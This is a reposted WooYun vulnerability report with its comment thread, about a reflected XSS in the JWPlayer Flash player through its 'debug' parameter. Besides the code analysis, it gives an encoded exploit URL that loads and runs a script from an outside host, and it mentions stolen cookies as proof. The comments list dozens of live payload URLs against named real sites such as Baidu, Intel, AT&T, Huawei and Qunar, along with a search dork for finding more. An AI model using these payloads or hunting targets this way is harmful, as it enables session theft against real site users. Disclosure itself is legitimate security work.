缺陷编号:WooYun-2012-07166

漏洞标题:JWPlayer Xss 0day [Flash编程安全问题]

相关厂商:LongTail Video

漏洞作者:gainover

提交时间:2012-05-15

公开时间:2012-05-15

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源:http://www.wooyun.org

Tags标签:第三方不可信程序 XSS 反射型xss flash安全 flash应用安全 flash利用 JWPlayer

披露状态:

2012-05-15:积极联系厂商并且等待厂商认领中,细节不对外公开

2012-05-15:厂商已经主动忽略漏洞,细节向公众公开

简要描述:

国外的一款播放器,使用网站数量超过百万,官方介绍:“LongTail Video is a New York-based startup that has pioneered the web video market. Our flagship product the - JW Player - is active on over one million websites and streams billions of videos each month.”

该FLASH版本视频播放器代码编写上存在一处安全问题,利用之前我所用到的技巧,可以进行跨站攻击。

它自己主站跨站到无所谓啦,但是用到这个播放器的其它网站就难说了。

比如中国的“去哪儿” ,美国的某某某某站。。

详细说明:

A Xss vulnerability in JWPlayer

Test Browser: IE , Firefox.

Test Platform: Win 7.

1. The Bug code in

package com.longtailvideo.jwplayer.utils
class Logger
private static function send(_arg1:String):void

if (ExternalInterface.available){
ExternalInterface.call(_config.debug, text);<---directly use _config.debug
};

2. The _config.debug is directly used as the first parameter of ExternalInterface.call. And the _config is loaded from loaderInfo.parameters. Therefore, when we construct a link such as " jwplayer.swf?debug=(function(){alert('xxx')})() ", the passed-in javascript code will be run.

3. Then we can use the trick   location.href='javascript:"<script src={js file url}></script>"'   to load and run external javascript file.

Test encoded evil code:

http://player.longtailvideo.com/player.swf?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D)

4. That's all

漏洞证明:

1. Simple Alert

JWPlayer Xss 0day [Flash编程安全问题]

2. Stolen Cookies in a chinese e-commerce website.

JWPlayer Xss 0day [Flash编程安全问题]

修复方案:

Limit the length of "debug" parameters and check its content.

乌云欢乐吐槽:

2012-05-15 23:40 | imlonghao (核心白帽子 | Rank:600 漏洞数:60 | 喜迎世界末日!)

跨站师,去把各大视频网站扫荡一遍吧!

1#

2012-05-15 23:47 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@去哪儿 关于这个播放器的,俺也不单独发了。。

http://tuan.qunar.com/static/img/player.swf?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D%29

2#

2012-05-16 00:24 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@Intel

http://www.intel.com/about/companyinfo/healthcare/products/reader/swf/player.swf?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D%29

3#

2012-05-16 00:31 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@百度

http://youxi.baidu.com/media/player.swf?debug=function(){alert(/xxx/)} 貌似服务器那边过滤了' 利用代码上需要稍微变通

4#

2012-05-16 00:34 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@AT&T

http://pte.att.com/player.swf?debug=alert

5#

2012-05-16 00:36 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@百度

http://www.baidu.com/search/zhidao/badminton/jwplayer/player.swf?debug=alert 主域名的

6#

2012-05-16 00:37 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@百度

http://ued.baidu.com/wp-content/plugins/flash-video-player/mediaplayer/player.swf?debug=alert 百度UED,看来很多装了WP的都用了这个插件。

7#

2012-05-16 00:38 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@百度

http://sem.baidu.com/jw_player/player.swf?debug=alert

8#

2012-05-16 00:39 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@gainover 你妹。。你怎么搜索的。。我怎么没找到这么多

9#

2012-05-16 00:44 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@蟋蟀哥哥 = = GOOGLE inurl:(player.swf) 其它的你懂的。。

10#

2012-05-16 00:44 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@新浪

http://nokia.sina.com.cn/n8/player/player.swf?debug=alert

11#

2012-05-16 00:48 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@gainover 别爆了,留着刷分。。。

12#

2012-05-16 00:53 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@蟋蟀哥哥 = = 这些都给厂商算了,反正我也没用的到的地方。。 这文章已经公开了,被别人拿去做坏事了也不太好,先把大站好找的找了先咯。。

13#

2012-05-16 00:53 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@gainover 哈哈。。

14#

2012-05-16 01:09 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@猫扑

http://yximg.mop.com/minisite/201007/baodaopage/Scripts/player.swf?debug=alert

15#

2012-05-16 01:10 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@猫扑

http://yximg.mop.com/minisite/200911/jilie/Scripts/player.swf?debug=alert

16#

2012-05-16 02:08 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@中国网络电视台

http://t.live.cntv.cn/oceantest/player.swf?debug=alert

17#

2012-05-16 02:12 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@走秀网

http://tuan.xiu.com/static/theme/YellowUMZZ/img/player.swf?debug=alert

18#

2012-05-16 02:13 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@百合网

http://images.baihe.com/images/landingpage/images/video/player.swf?debug=alert

= = 感觉每个站都在用这个播放器

19#

2012-05-16 02:17 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@百合网

http://act.baihe.com/event/1104lovevideo/player.swf?debug=alert

http://story.baihe.com/player.swf?debug=alert

http://act.baihe.com/event/1009zhidao/player.swf?debug=alert

http://act.baihe.com/event/1026zhidao/player.swf?debug=alert

另外 act.baihe.com 与 story.baihe.com , images.baihe.com 全部都存在apache http-only cookies 泄漏漏洞。

20#

2012-05-16 02:19 | testcvc ( 实习白帽子 | Rank:5 漏洞数:1 | test)

@gainover 大站都快被你爆完了

21#

2012-05-16 02:21 | zeracker ( 普通白帽子 | Rank:891 漏洞数:119 | 哥,怒了!)

我嘞个去。灾难来了。。。。

22#

2012-05-16 02:21 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@诺基亚

http://blog.maps.nokia.com/wp-content/plugins/vipers-video-quicktags/resources/jw-flv-player/player.swf?debug=alert

23#

2012-05-16 02:24 | zeracker ( 普通白帽子 | Rank:891 漏洞数:119 | 哥,怒了!)

@gainover ..................................... 这个cncert应该要预警了吧? @cncert国家互联网应急中心 呼叫,呼叫

24#

2012-05-16 02:28 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@zeracker = = 不晓得, 反正国内用这个程序的不在少数。 腾讯啥的也有用,不过他们用的是旧版的。。4.1的。 感觉其实这个可以交给 cncert 处理的。

25#

2012-05-16 02:40 | 小禾吉( 实习白帽子 | Rank:0 漏洞数:1 | 宇宙的目的很可能和人类没有关系,宇宙很可...)

这个很霸气~

26#

2012-05-16 02:45 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@京东商城

http://market.360buy.com/zhuanmai/ECOVACS/player.swf?debug=alert

27#

2012-05-16 02:47 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@华为

http://ipv6.huawei.com/en/ucmf/groups/public/documents/webasset/player.swf?debug=alert

28#

2012-05-16 02:51 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@华为技术有限公司 好像挺多。。

http://ipv6.huawei.com/en/ucmf/groups/public/documents/webasset/player.swf?debug=alert

http://www-hk.huawei.com/cn/ucmf/groups/public/documents/webasset/player.swf

http://ipv6.huawei.com/cn/ucmf/groups/public/documents/webasset/player.swf

http://www.huawei.com/minisite/mwc2012/cn/js/player.swf

http://www.huawei.com/za/ucmf/groups/public/documents/webasset/player.swf

以下省略若干个

29#

2012-05-16 02:52 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@4399小游戏

http://news.4399.com/tnt/images/player.swf?debug=alert

30#

2012-05-16 02:54 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@4399小游戏

http://news.4399.com/dnf/flash/player.swf DNF。。。 不会每个游戏目录下都有一个吧!!

31#

2012-05-16 03:00 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@盛大在线

http://qn.sdo.com/web1/swf/player.swf

http://qn.sdo.com/web/swf/player.swf

http://media.static.sdo.com/ac/ac/project/acguide/flash/player.swf?debug=alert

32#

2012-05-16 03:02 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@凤凰网

http://sn.ifeng.com/guowenwangzhan/greensn/video/player.swf?debug=alert

33#

2012-05-16 03:05 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@久游网

http://dl-hb.9you.com/play/Player.swf?debug=alert

34#

2012-05-16 03:13 | 小博( 实习白帽子 | Rank:3 漏洞数:1 | 一个关注与信息安全 程序开发的IT程序员)

别爆了

35#

2012-05-16 03:20 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@小博 没的爆了,差不多就这么些吧~~ 肯定还有一些是改过名字,不叫player.swf 的~~ 得换个方法搜索了

36#

2012-05-16 03:33 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

试了下,果然有不叫player.swf的 比如新浪的 @新浪

http://all.vic.sina.com.cn/listerine21days/flash/player/player-viral.swf

37#

2012-05-16 03:35 | 小博( 实习白帽子 | Rank:3 漏洞数:1 | 一个关注与信息安全 程序开发的IT程序员)

@gainover 好的 还有发现的么 我去提交个 看能不能换个新浪的礼物

38#

2012-05-16 05:58 | yingzi ( 普通白帽子 | Rank:38 漏洞数:3 )

关注中

39#

2012-05-16 05:58 | imlonghao (核心白帽子 | Rank:600 漏洞数:60 | 喜迎世界末日!)

@cncert国家互联网应急中心 有预警这东西么?

40#

2012-05-16 08:05 | Hxai11 ( 普通白帽子 | Rank:245 漏洞数:47 | 让我们面对现实 , 让我们忠于理想 --切....)

危险系数很高!!

41#

2012-05-16 08:59 | wanglaojiu ( 普通白帽子 | Rank:45 漏洞数:12 | 道生一,一生二,二生三,三生万物,万物负...)

这么危险的东西,看来好多网站限制使用swf还是有先见之明的。

42#

2012-05-16 09:34 | 123 ( 实习白帽子 | Rank:27 漏洞数:3 | 123)

帅气,我先把我的换掉

43#

2012-05-16 09:45 | ufohacker ( 实习白帽子 | Rank:3 漏洞数:1 | 提高的是能力不是技术!)

求一次完整的攻击实例。

44#

2012-05-16 10:12 | wanglaojiu ( 普通白帽子 | Rank:45 漏洞数:12 | 道生一,一生二,二生三,三生万物,万物负...)

我了个去,试了下基本都是国内的弹框,国外的还没找到个能弹的,难道是后门......同志还需努力啊,代码还是自己敲的好,拷贝来拷贝去的终归不是长久之计。

45#

2012-05-16 10:29 | Power ( 实习白帽子 | Rank:16 漏洞数:2 )

太牛逼了.........

46#

2012-05-16 10:40 | hellok (核心白帽子 | Rank:123 漏洞数:10 | 酱油党路过)

cool~

47#

2012-05-16 10:51 | horseluke ( 普通白帽子 | Rank:84 漏洞数:14 | Realize the dream in earnest.)

JWPlayer的使用量已经达到类似于框架使用的范围,所以出问题这么多也不奇怪。

48#

2012-05-16 11:10 | Lee ( 普通白帽子 | Rank:113 漏洞数:24 | wataru@eviloctal.com)

good!

49#

2012-05-16 11:41 | p.z (核心白帽子 | Rank:300 漏洞数:20 | 我在沉默中被放屁惊醒)

威武! 求共享命令行下反编译工具!!!

50#

2012-05-16 12:13 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@p.z = = 哭一个,我没找到。。 swftools里没有把swf转as的。。 就只看到一个在线转换的 swf2as (真想搞到源码)。 不过ASV有批量的功能。

51#

2012-05-16 16:34 | Valo洛洛( 普通白帽子 | Rank:385 漏洞数:43 | Gone with the sin.)

牛逼了 我去

52#

2012-05-17 16:30 | 小龙女( 实习白帽子 | Rank:3 漏洞数:1 | venus)

super ,ps,为啥我是见习白帽子

53#

2012-05-17 22:51 | 肥田鸡( 实习白帽子 | Rank:13 漏洞数:2 | 今天的最好表现是明天的最低要求)

nice!

54#

2012-05-18 07:48 | Hxai11 ( 普通白帽子 | Rank:245 漏洞数:47 | 让我们面对现实 , 让我们忠于理想 --切....)

@小龙女 哈哈,现在wooyun等级制度了

55#

2012-09-25 12:05 | 神刀( 实习白帽子 | Rank:23 漏洞数:3 | www.shellsec.com内射那么牛,虾米没妹子?)

好HI

56#

转自:http://www.wooyun.org/bugs/wooyun-2010-07166